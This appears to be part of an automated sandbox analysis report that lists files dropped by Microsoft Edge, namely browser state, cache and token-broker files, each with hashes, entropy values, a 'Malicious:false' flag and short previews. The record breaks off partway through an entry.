                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2ecb7.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44252
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.090984085083194
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4koMyrWofptdzpwSAxrLtyRgnMUK8oZHCZoD:z/Ps+wsI7ynAtdz01j0RGoD
                                                                                                                                                                                                                                                                                                        MD5:2EBF7B96897AD8F4A41D158B91AFF425
                                                                                                                                                                                                                                                                                                        SHA1:1FC283D16B7EC158FF93CB089D74E3E64E1EB6A1
                                                                                                                                                                                                                                                                                                        SHA-256:39D9923F35E196A4C596DE226653C6A42B3BC4B6ADE4AF234797E5BF9015E21C
                                                                                                                                                                                                                                                                                                        SHA-512:C4FE77406CF892A9F83031FC7ED3C8426174728AAB40AE2709CCD6295CBB7C4FCF53146E7C0471B3DC77165E63F8867C481CDC756A4D4D8CC4B08547607029B6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2ed63.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44252
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.090984085083194
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4koMyrWofptdzpwSAxrLtyRgnMUK8oZHCZoD:z/Ps+wsI7ynAtdz01j0RGoD
                                                                                                                                                                                                                                                                                                        MD5:2EBF7B96897AD8F4A41D158B91AFF425
                                                                                                                                                                                                                                                                                                        SHA1:1FC283D16B7EC158FF93CB089D74E3E64E1EB6A1
                                                                                                                                                                                                                                                                                                        SHA-256:39D9923F35E196A4C596DE226653C6A42B3BC4B6ADE4AF234797E5BF9015E21C
                                                                                                                                                                                                                                                                                                        SHA-512:C4FE77406CF892A9F83031FC7ED3C8426174728AAB40AE2709CCD6295CBB7C4FCF53146E7C0471B3DC77165E63F8867C481CDC756A4D4D8CC4B08547607029B6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2f39d.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44252
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.090984085083194
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4koMyrWofptdzpwSAxrLtyRgnMUK8oZHCZoD:z/Ps+wsI7ynAtdz01j0RGoD
                                                                                                                                                                                                                                                                                                        MD5:2EBF7B96897AD8F4A41D158B91AFF425
                                                                                                                                                                                                                                                                                                        SHA1:1FC283D16B7EC158FF93CB089D74E3E64E1EB6A1
                                                                                                                                                                                                                                                                                                        SHA-256:39D9923F35E196A4C596DE226653C6A42B3BC4B6ADE4AF234797E5BF9015E21C
                                                                                                                                                                                                                                                                                                        SHA-512:C4FE77406CF892A9F83031FC7ED3C8426174728AAB40AE2709CCD6295CBB7C4FCF53146E7C0471B3DC77165E63F8867C481CDC756A4D4D8CC4B08547607029B6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF31a30.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44252
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.090984085083194
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4koMyrWofptdzpwSAxrLtyRgnMUK8oZHCZoD:z/Ps+wsI7ynAtdz01j0RGoD
                                                                                                                                                                                                                                                                                                        MD5:2EBF7B96897AD8F4A41D158B91AFF425
                                                                                                                                                                                                                                                                                                        SHA1:1FC283D16B7EC158FF93CB089D74E3E64E1EB6A1
                                                                                                                                                                                                                                                                                                        SHA-256:39D9923F35E196A4C596DE226653C6A42B3BC4B6ADE4AF234797E5BF9015E21C
                                                                                                                                                                                                                                                                                                        SHA-512:C4FE77406CF892A9F83031FC7ED3C8426174728AAB40AE2709CCD6295CBB7C4FCF53146E7C0471B3DC77165E63F8867C481CDC756A4D4D8CC4B08547607029B6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3dd13.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44252
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.090984085083194
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4koMyrWofptdzpwSAxrLtyRgnMUK8oZHCZoD:z/Ps+wsI7ynAtdz01j0RGoD
                                                                                                                                                                                                                                                                                                        MD5:2EBF7B96897AD8F4A41D158B91AFF425
                                                                                                                                                                                                                                                                                                        SHA1:1FC283D16B7EC158FF93CB089D74E3E64E1EB6A1
                                                                                                                                                                                                                                                                                                        SHA-256:39D9923F35E196A4C596DE226653C6A42B3BC4B6ADE4AF234797E5BF9015E21C
                                                                                                                                                                                                                                                                                                        SHA-512:C4FE77406CF892A9F83031FC7ED3C8426174728AAB40AE2709CCD6295CBB7C4FCF53146E7C0471B3DC77165E63F8867C481CDC756A4D4D8CC4B08547607029B6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF40432.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44252
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.090984085083194
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4koMyrWofptdzpwSAxrLtyRgnMUK8oZHCZoD:z/Ps+wsI7ynAtdz01j0RGoD
                                                                                                                                                                                                                                                                                                        MD5:2EBF7B96897AD8F4A41D158B91AFF425
                                                                                                                                                                                                                                                                                                        SHA1:1FC283D16B7EC158FF93CB089D74E3E64E1EB6A1
                                                                                                                                                                                                                                                                                                        SHA-256:39D9923F35E196A4C596DE226653C6A42B3BC4B6ADE4AF234797E5BF9015E21C
                                                                                                                                                                                                                                                                                                        SHA-512:C4FE77406CF892A9F83031FC7ED3C8426174728AAB40AE2709CCD6295CBB7C4FCF53146E7C0471B3DC77165E63F8867C481CDC756A4D4D8CC4B08547607029B6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_1

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0018238520723782249
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zEflsq:/M/xT02zNq
                                                                                                                                                                                                                                                                                                        MD5:044650889AC8842D4577A9C021A09483
                                                                                                                                                                                                                                                                                                        SHA1:894813AED2BAAA95FFA62713EE9B4E7638E1392A
                                                                                                                                                                                                                                                                                                        SHA-256:DD5F3B60DD3BA0E6F8B17FF114F508E76ED721E5A2B03D9B48AFDB5E8D36A2A9
                                                                                                                                                                                                                                                                                                        SHA-512:0E8A1111B2D3A1CB962ACA4BA1EB66FB0FDCB37437330E500435BE8531C6B19F5060F1D09F9A32E4DCE316904A1E51F3D221A87D8987B9635ED1608FFF47B94E
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):86
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
                                                                                                                                                                                                                                                                                                        MD5:16B7586B9EBA5296EA04B791FC3D675E
                                                                                                                                                                                                                                                                                                        SHA1:8890767DD7EB4D1BEAB829324BA8B9599051F0B0
                                                                                                                                                                                                                                                                                                        SHA-256:474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
                                                                                                                                                                                                                                                                                                        SHA-512:58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\d5b90401-2aa6-49ba-9751-3dc7a7327fef.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):45409
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.083770317885028
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:1MkbJrT8IeQc5dZr/yrWobiteza9RS4VxYrCZocrLtyRgnMUK8oZRS:1Mk1rT8H1ZltezSxwGoc1j0S
                                                                                                                                                                                                                                                                                                        MD5:84F90A7FBBBA42F458E52AB05558E4F2
                                                                                                                                                                                                                                                                                                        SHA1:FE5C12816C4E1B534370F1EF7B7CEE0386482CF9
                                                                                                                                                                                                                                                                                                        SHA-256:D7C53D10C9AD90C8574C56E1CF7E87FED1BFD4543100E170D98027E0685F2AFF
                                                                                                                                                                                                                                                                                                        SHA-512:C86376E8450D1D823D71B9B10F23A0F9BB835F40C72CFD6F2C0A3148AFE74A2079F010E41F711203BE165F0F1F55256A84BFB217955A04B23D892F28FAF87F16
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734530131"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2278
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.850755992628174
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:uiTrlKxrgxLOqxl9Il8uZikJ59hVjc+e7BndJV97EP4JXHt3d1rc:mpuYf759fcDBnzVxEgpG
                                                                                                                                                                                                                                                                                                        MD5:452A9AFB745B1E5DE79598D535EF8D1F
                                                                                                                                                                                                                                                                                                        SHA1:1806CFE1CE82498A420EC8C4E4B319701EBFEAFF
                                                                                                                                                                                                                                                                                                        SHA-256:16825CE180D91E590E57C87DB15D193CF6860F4C828597C31742E05BE1BD6A1E
                                                                                                                                                                                                                                                                                                        SHA-512:DF68096BD73D8A8B6E41823DFE8D0C659C9BD98EAC10DEE6B7BA5349B4C42CD1F2DBE60F2D8A75BA42F27193ABA8F6D99BA495FCCBE65AEC47BB19B4A5066DFA
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.E.q.2.4.l.x.R.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.b.K.q.+.P.k.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
